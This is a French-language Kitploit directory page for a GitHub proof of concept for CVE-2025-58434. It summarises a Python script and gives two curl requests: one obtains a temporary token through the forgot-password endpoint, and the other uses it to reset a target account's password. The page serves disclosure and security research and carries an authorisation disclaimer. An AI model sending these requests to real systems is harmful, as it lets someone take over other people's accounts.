Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 Preuve de concept | Kitploit
Outils/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 Preuve de concept

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58434 PoC

Script Python de preuve de concept pour déclencher POST /api/v1/account/forgot-password.

⚠️ Uniquement pour la recherche en sécurité à des fins éducatives et autorisées. Exécuter cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite de test est illégal.

Crédits

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

Détails

  • PoC pour CVE-2025-58434
  • Référence : https://github.com/advisories/GHSA-wgpv-6j63-x5ph

Fichiers

  • poc.py : demande l'URL/IP de la machine, le protocole facultatif lorsqu'un hôte/IP nu est utilisé, l'e-mail cible et le mot de passe ; puis envoie la requête et affiche le statut HTTP, les en-têtes et le corps de la réponse, comme curl -i

Utilisation

Exécutez :

root@kitploit:~
python3 poc.py

Fournissez ensuite :

  • l'URL/IP de la machine, par exemple 10.10.11.10, http://10.10.11.10 ou https://target.example
  • le protocole si un hôte/IP nu est demandé
  • l'adresse e-mail
  • le mot de passe

Équivalent curl

Première requête

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

Deuxième requête

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
Télécharger l’outil